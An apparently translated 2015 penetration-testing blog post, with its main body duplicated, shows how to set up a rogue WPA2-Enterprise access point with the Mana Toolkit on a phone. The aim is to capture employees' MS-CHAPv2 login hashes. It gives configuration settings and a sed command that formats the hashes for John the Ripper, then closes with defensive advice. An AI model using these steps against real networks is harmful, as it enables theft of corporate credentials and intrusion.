March 3, 2015 at 15:52How corporate hack Wi-Fi: new features
There are a lot of articles about hacking Wi-Fi on the Internet, but most of them relate to the WEP / WPA (2) -Personal operating mode, in which you need to intercept the “handshake” procedure of the client and the Wi-Fi point. Many corporate Wi-Fi networks use the WPA2-Enterprise security mode, with authentication by login and password - as the least expensive way. In this case, authentication is carried out using a RADIUS server.
The client OS establishes a connection to the RADIUS server using encryption using TLS, and authentication is mainly done using the MS-CHAPv2 protocol.
To test penetration in such a network, we can create a fake Wi-Fi point with a RADIUS server - and get the login, request and response that MS-CHAPv2 uses. This is enough for further password bruteforce.
We need Kali Linux and a card that supports operation in Access Point mode, which can be checked using the iw list command, we are interested in the line:
A year ago, we had to do a lot of manipulations in order to fake such an access point with the possibility of obtaining credentials. It was necessary to patch, build and correctly configure certain versions of hostapd and FreeRADIUS. In August 2014, the Mana Toolkit appeared , allowing you to automate many attack vectors for wireless clients.
Since using a laptop is not always convenient, we will use a more compact version - a telephone . Alternatively, you can use Raspberry Pi + FruityWifi. WiFi Pineapple, unfortunately, does not support Mana.
We launch Kali We
connect the Wi-Fi card through the USB-OTG cable. Launch the NetHunter application.
The first thing to do is determine the interface of the connected Wi-Fi card. To do this, select Kali Launcher from the menu and launch Wifite. In our case, this is the wlan1 interface. In the menu, select MANA Evil Access Point. Set point:
Disable karma (enable_karma = 0), specify the buffer to which received logins and hashes (ennode) will be sent. We have at our disposal a set of five scripts that launch, in addition to the access point, additional utilities for implementing MITM attacks. We are interested in the mana-noupstream-eap script, which is designed for points with 802.1x authentication. By default, the script tries to "pull off" the received hash, connect the client and conduct a MITM attack. Since cracking hashes on the phone is not a good idea, we comment on unnecessary lines, add a command that will write intercepted data to a file on a USB flash drive, and run Mana.
As soon as the Wi-Fi client is close enough to our access point, it will try to authenticate with it. A good place to ambush is at the entrance to the office or business center, time is the beginning or the end of the working day, when potential victims pass the checkpoint.
We stop Mana and check what we caught. Received Data Format: Protocol | Login | Challenge | Response Now you can crack the received hashes in a calm environment on a normal computer. This will help us to: - Asleap (used in the original script), - the John the Ripper (need to be slightly modified resulting hashes: )
The obtained accounts can be used to further penetrate the corporate network via Wi-Fi or VPN, as well as to gain access to corporate mail.
As it turned out, it is not always possible to intercept user hashes. Desktop OS (Windows, MacOS, Linux), as well as iOS users are best protected. When connecting for the first time, the OS asks if you trust the certificate used by the RADIUS server on this Wi-Fi network. When replacing a legitimate access point, the OS will ask about trust in a new certificate that uses a RADIUS server. This will happen even when using a certificate issued by a trusted certification authority (Thawte, Verisign).
When using Android devices, the certificate is not checked by default, but it is possible to specify a root certificate that can be used on this Wi-Fi network.
Windows Phone-based devices validate the certificate by default. Server certificate verification options are also available:
Summarizing all the above, Positive Technologies experts recommend the following security measures:
Posted by Dmitry Trifonov, Positive Technologies Research Center
We need Kali Linux and a card that supports operation in Access Point mode, which can be checked using the iw list command, we are interested in the line:
* #{ AP, mesh point } <= 8,A year ago, we had to do a lot of manipulations in order to fake such an access point with the possibility of obtaining credentials. It was necessary to patch, build and correctly configure certain versions of hostapd and FreeRADIUS. In August 2014, the Mana Toolkit appeared , allowing you to automate many attack vectors for wireless clients.
Since using a laptop is not always convenient, we will use a more compact version - a telephone . Alternatively, you can use Raspberry Pi + FruityWifi. WiFi Pineapple, unfortunately, does not support Mana.
We launch Kali We
connect the Wi-Fi card through the USB-OTG cable. Launch the NetHunter application.
The first thing to do is determine the interface of the connected Wi-Fi card. To do this, select Kali Launcher from the menu and launch Wifite. In our case, this is the wlan1 interface. In the menu, select MANA Evil Access Point. Set point:
- the interface defined in the previous step (interface),
- Hacked Wi-Fi network SSID (ssid)
- Using 802.1x authentication protocol (ieee8021x = 1),
- options wpa (wpa) ( 0 = without WPA / WPA2; 1 = WPA; 2 = IEEE 802.11i / RSN (WPA2); 3 = WPA and WPA2),
- list of accepted key management algorithms (wpa_key_mgmt = WPA-EAP),
- set of accepted encryption algorithms (wpa_pairwise),
Disable karma (enable_karma = 0), specify the buffer to which received logins and hashes (ennode) will be sent. We have at our disposal a set of five scripts that launch, in addition to the access point, additional utilities for implementing MITM attacks. We are interested in the mana-noupstream-eap script, which is designed for points with 802.1x authentication. By default, the script tries to "pull off" the received hash, connect the client and conduct a MITM attack. Since cracking hashes on the phone is not a good idea, we comment on unnecessary lines, add a command that will write intercepted data to a file on a USB flash drive, and run Mana.
As soon as the Wi-Fi client is close enough to our access point, it will try to authenticate with it. A good place to ambush is at the entrance to the office or business center, time is the beginning or the end of the working day, when potential victims pass the checkpoint.
We stop Mana and check what we caught. Received Data Format: Protocol | Login | Challenge | Response Now you can crack the received hashes in a calm environment on a normal computer. This will help us to: - Asleap (used in the original script), - the John the Ripper (need to be slightly modified resulting hashes: )
cat HASHES.txt | sed 's/://g' | sed 's/\([^|]*\)|\([^|]*\)|\([^|]*\)|\([^|]*\)/\2:$NETNTLM$\3$\4/' > john-HASHES.txtThe obtained accounts can be used to further penetrate the corporate network via Wi-Fi or VPN, as well as to gain access to corporate mail.
As it turned out, it is not always possible to intercept user hashes. Desktop OS (Windows, MacOS, Linux), as well as iOS users are best protected. When connecting for the first time, the OS asks if you trust the certificate used by the RADIUS server on this Wi-Fi network. When replacing a legitimate access point, the OS will ask about trust in a new certificate that uses a RADIUS server. This will happen even when using a certificate issued by a trusted certification authority (Thawte, Verisign).
When using Android devices, the certificate is not checked by default, but it is possible to specify a root certificate that can be used on this Wi-Fi network.
Windows Phone-based devices validate the certificate by default. Server certificate verification options are also available:
- not;
- always ask;
- Certification Authority.
Summarizing all the above, Positive Technologies experts recommend the following security measures:
- users - check certificates when connecting not only to the Internet bank, but also to corporate Wi-Fi;
- Android users - install the root certificate, which is used on the corporate network;
- for administrators - switch to the use of certificate-based authentication (or not be surprised if people with a phone and antenna appear periodically before entering the office).
Posted by Dmitry Trifonov, Positive Technologies Research Center